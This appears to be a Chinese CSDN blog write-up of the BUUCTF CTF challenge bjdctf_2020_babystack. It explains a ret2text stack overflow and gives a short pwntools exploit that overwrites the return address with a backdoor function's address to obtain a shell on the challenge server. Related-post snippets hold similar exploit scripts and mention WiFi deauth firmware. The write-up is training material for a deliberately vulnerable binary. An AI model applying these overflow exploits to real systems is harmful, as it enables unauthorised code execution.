【BUUCTF-PWN】10-bjdctf_2020_babystack

燕麦葡萄干

于 2024-07-05 00:20:44 发布

阅读量141

点赞数 1

分类专栏： CTF-PWN 文章标签： CTF BUUCTF PWN

本文链接：https://blog.csdn.net/weixin_43785509/article/details/140193368

版权

CTF-PWN 专栏收录该内容

12 篇文章 0 订阅

订阅专栏

简单的栈溢出，ret2text

64位，开启了NX保护
在这里插入图片描述

执行效果：
在这里插入图片描述

main函数：
在这里插入图片描述

因为读入的字符长度可以由用户输入的第一个参数值决定，因此read函数存在栈溢出
覆盖距离为0x10+8
在这里插入图片描述

存在后门函数：
在这里插入图片描述

后门函数地址0x4006E6
在这里插入图片描述

这里做不做堆栈平衡都可以，试了一下加不加1都可以打通
exp如下：

from pwn import *
io = remote("node5.buuoj.cn",28478)
payload1 = '33'
io.sendlineafter("Please input the length of your name:\n",payload1)
payload2 = b'a'*(0x10+8)+p64(0x4006E6+1)
io.sendlineafter("What's u name?\n",payload2)
io.interactive()

运行结果：
在这里插入图片描述

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

燕麦葡萄干

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

BUUCTF pwn——bjdctf_2020_babystack

CNS-Enterprise BCC-1701-J

03-31

253

BUUCTF 做题练习

BUUCTF PWN bjdctf_2020_babystack

Rt1Text的博客

04-23

327

1.checksec+运行 64位/NX保护 2.64位IDA进行中 1.main函数 read()函数溢出跟进buf,看看偏移 offset=0x10+8 但要注意一点: read(0, buf, (unsigned int)nbytes); 无符号整型,需要输入-1,进行整型溢出接下来就是常规的操作 backdoor函数地址 3.直接上脚本 from pwn import* #p=process('./12babystack') p=remote...

参与评论您还未登录，请先登录后发表或查看评论

【CTF】BUUCTF-bjdctf_2020_babystack1

weixin_53394081的博客

03-06

448

PWN

BUUCTF-PWN-bjdctf_2020_babystack1

qq_75106749的博客

10-29

执行信息逆向： /bin/sh 地址为0x4006E6main函数地址0x4006FB第二次读入有明显的溢出漏第一次输入的数据是第二次可读入数据的长度，可由此实现栈溢出,构建expp.sendline('50')#目的是给一个足够大的空间能够输出/bin/sh# payload =p64(flag_addr)+b'a'*(0x10+8) 要注意发送字节的顺序，首先填充的是nbytes,所以这条语句会出现EOF。

CTF buuoj pwn-----第10题: bjdctf_2020_babystack

热门推荐

bing_Max的博客

09-28

2万+

思路本体有后门函数, 最简单的是直接调用. 这里想用一下system函数,一开始忘了是32位的,写了个payload_1 = b’a’*(0x10+8) + p64(system_addr)+p64(1)+p64(binsh_addr) 显然不成功后来反映过来, 写了payload_1 = b’a’*(0x10+8) + p64(pop_rdi_addr)+p64(binsh_addr)+p64(system_addr),成功获取flag 编写exp from pwn import * con

[BUUCTF]PWN——bjdctf_2020_babystack

BangSen1的博客

03-29

316

例行检查，64位，开启NX保护运行一下，用IDA打开，检索字符串，看到了后门跟进查看。找到了地址，shelladdr=0x4006EA 查看主函数接收函数长度由我们自己决定，由此可以造成溢出。 from pwn import* r=remote('node3.buuoj.cn',25232) shelladdr=0x4006EA r.sendline('100') payload='a'*(0x10+8)+p64(shelladdr) r.sendline(payload) r.

BUUCTF-Pwn-bjdctf_2020_babystack

餐桌上的猫

03-04

119

题目截图

BUUCTF(pwn)bjdctf_2020_babystack2

半岛铁盒的博客

04-04

210

这是一道整形溢出的题目 from pwn import * p = remote("node3.buuoj.cn",28786) flag=0x400726 p.sendlineafter("[+]Please input the length of your name:\n",'-1') p.recv() payload='a'*(0x10+8)+p64(flag) p.sendline(payload) p.interactive() 有疑问的欢迎留言 ...

BUUCTF pwn——bjdctf_2020_babystack2

CNS-Enterprise BCC-1701-J

04-12

149

BUUCTF 做题练习

[BUUCTF]PWN18——bjdctf_2020_babystack

mcmuyanga的博客

09-02

3007

[BUUCTF]PWN18——bjdctf_2020_babystack 附件步骤：例行检查，64位，开启了nx保护试运行一下程序大概了解程序的执行过程后用64位ida打开，shift+f12先查看一下程序里的字符串看到/bin/sh双击跟进，ctrl+x找到了后门函数，shell_addr=0x4006e6 根据试运行的回显，找到了输入点一个简单的小程序，buf读入的数据长度由我们输入的nbytes来控制，所以这里可以利用它来溢出 EXP from pwn import* r=re

Wi-PWN_8.0_ENGLISH_OLED.bin

08-25

这是ESP8266的带OLED显示的WIFI杀手固件。

BUUCTF-pwn2_sctf_2016

weixin_44145820的博客

03-06

1005

这题利用的是负数转无符号数造成缓冲区溢出，以及泄露libc基地址执行ROP 题目分析由于NX开启，我们考虑使用ROP，Canary没有打开使得这题变得很方便下面是vuln函数：在该函数中，程序读入一个字符串并转化为带符号整形（signed int），这时，如果我们输入负数可以避开不能大于32的检查在get_n函数中，读入长度被强制转换为unsigned int，此时-1变成了42949...

BUUCTF-Pwn-get_started_3dsctf_2016

餐桌上的猫

03-04

194

题目截图

【BUUCTF - PWN】ciscn_2019_c_1

古月浪子的博客

03-20

4094

checksec一下 IDA打开看看，encrypt函数内存在栈溢出漏洞由于程序会将输入的内容加密，这会破坏我们的payload，所以注意到strlen函数，通过在payload开头放上 \0 来绕过加密由于程序内没有后门函数，也没有system函数，所以考虑ret2libc 特别注意到题目是部署在Ubuntu18上的，因此调用system需要栈对齐，这里填充ret来对齐 from pwn...

五次全国1%抽样个人微观数据(最新整理)

最新发布

10-10

1、资源内容地址：https://blog.csdn.net/2301_79696294/article/details/142833919 2、代码特点：今年全新，手工精心整理，放心引用，数据来自权威，相对于其他人的控制变量数据准确很多,适合写论文做实证用，不会出现数据造假问题 3、适用对象：大学生，本科生，研究生小白可用，容易上手！！！ 3、课程引用: 经济学，地理学，城市规划与城市研究，公共政策与管理，社会学，商业与管理

户外储能电源2Kw（最大3Kw）双向逆变器电路资料本方案整体特性如下：一.双向软开关DC-DC，高效率，充电时具有PFC和

10-10

户外储能电源2Kw（最大3Kw）双向逆变器电路资料。本方案整体特性如下：一.双向软开关DC-DC，高效率，充电时具有PFC和UPS功能，检测MOS内阻压降实行过流保护，最大充电功率：20A 1100W；二.控制部分：采用两颗M0+32位MCU（BAT32G139L048系列）其一：负责主逆变控制和市电PFC及UPS功能控制，其二：负责双向DC-DC控制及上位机通讯，逆变控制MCU采用单极性单极性倍频SPWM调制方式，效率高，干扰小，输出电压采电压、电流双环控制，动态响应快、负载适应能力强，全数字控制。上电自检功能：通过单片机轮流发信号并检测反馈信息的方式来判断驱动回路、功率回路是否存在故障，并发出报警用；三.功率部分：H桥IGBT采用650V30A 50A大电流管子；输入电压：44~58VDC(按需求调整电压）输出电压：220 230VAC±2% 电子资料包含原理图+PCB设计文件(Altium软件)，BOM,变压器参数说明

主动配电网两阶段鲁棒恢复matlab代码参考文献IEEE TRANSACTIONS ON POWER SYSTEMSRobu

10-10

主动配电网两阶段鲁棒恢复matlab代码参考文献IEEE TRANSACTIONS ON POWER SYSTEMS《Robust Restoration Method for Active Distribution Networks》提出了一种主动配电网两阶段自适应鲁棒恢复优化模型，涉及不确定DG出力和负荷大小。第一阶段为确定故障恢复策略，第二阶段则寻找最恶劣场景。采用C&CG方法进行求解。这份资源就是对该文献的详细解读及部分内容的matlab代码复现。主要内容： 1.详细的文献分析及代码解读文档 2.确定性故障恢复方法的matlab代码 3.两阶段鲁棒故障恢复方法的matlab代码 4.使用蒙特卡洛模拟法进行N-1故障扫描，以确定各方法的性能。

计算机网络期末复习题.docx

10-10

计算机网络期末复习

SpringBoot+Vue高校会议室预订管理系统答辩PPT.pptx

10-10

计算机毕业设计答辩PPT

mqtt-pwn安装

09-20

安装mqtt-pwn的步骤如下： 1. 克隆mqtt-pwn仓库：使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录：使用命令`cd mqtt-pwn`进入mqtt-...